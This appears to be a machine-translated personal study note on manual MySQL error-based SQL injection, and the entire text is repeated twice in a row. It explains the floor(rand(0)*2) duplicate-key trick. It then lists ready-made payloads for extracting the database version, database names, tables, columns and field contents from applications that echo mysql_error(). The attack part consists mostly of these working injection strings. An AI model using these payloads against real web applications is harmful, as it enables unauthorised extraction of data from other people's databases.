mysql error injection manual method
I used to think that there is such a long list of error injections, as well as various functions such as concat() and rand(), which are inconvenient to memorize and use, and have not been studied carefully. This time I studied it for a while, read some Daniel's summaries, and gained some experience, which is hereby recorded for subsequent consolidation and review.
Generally speaking, error injection is actually a formulaic injection method, which is mainly used when there is no display bit in the page, but it is used when the error message is output with echo mysql_error();.
The formula is as follows
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
We can actually see the shadow of ordinary injection in this statement. The version() of the fifth select clause shows the version used by the database, and the following information_schema.tables shows our corresponding system table information in mysql , the limit of the third clause is used to control each record traversing the database.
It should be noted that when we generally use limit manually, we use limit 0,1; limit,1,2;limit 2,3... This mode is used to traverse each item of the database in turn.
But it should be noted that the traversal method here needs to be adjusted: it becomes limit 0,1; limit1,1; limit 2,1... This form
After figuring out the formula of the statement, the rest of the injection process is very similar to our ordinary injection. We only need to adjust the structure corresponding to the statement:
The summary is as follows:
1. Violent database:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2. Violent data table:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=库名的十六进制 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
3. List of violent names:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
4. Violent field:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
To sum up, it is a set of formulas that have been formed, and then injected with the ordinary injection method.
Reference article:
http://www.jianshu.com/p/8c2343705100
https://www.waitalone.cn/mysql-error-based-injection.html
I used to think that there is such a long list of error injections, as well as various functions such as concat() and rand(), which are inconvenient to memorize and use, and have not been studied carefully. This time I studied it for a while, read some Daniel's summaries, and gained some experience, which is hereby recorded for subsequent consolidation and review.
Generally speaking, error injection is actually a formulaic injection method, which is mainly used when there is no display bit in the page, but it is used when the error message is output with echo mysql_error();.
The formula is as follows
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
We can actually see the shadow of ordinary injection in this statement. The version() of the fifth select clause shows the version used by the database, and the following information_schema.tables shows our corresponding system table information in mysql , the limit of the third clause is used to control each record traversing the database.
It should be noted that when we generally use limit manually, we use limit 0,1; limit,1,2;limit 2,3... This mode is used to traverse each item of the database in turn.
But it should be noted that the traversal method here needs to be adjusted: it becomes limit 0,1; limit1,1; limit 2,1... This form
After figuring out the formula of the statement, the rest of the injection process is very similar to our ordinary injection. We only need to adjust the structure corresponding to the statement:
The summary is as follows:
1. Violent database:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2. Violent data table:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=库名的十六进制 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
3. List of violent names:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
4. Violent field:
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
To sum up, it is a set of formulas that have been formed, and then injected with the ordinary injection method.
Reference article:
http://www.jianshu.com/p/8c2343705100
https://www.waitalone.cn/mysql-error-based-injection.html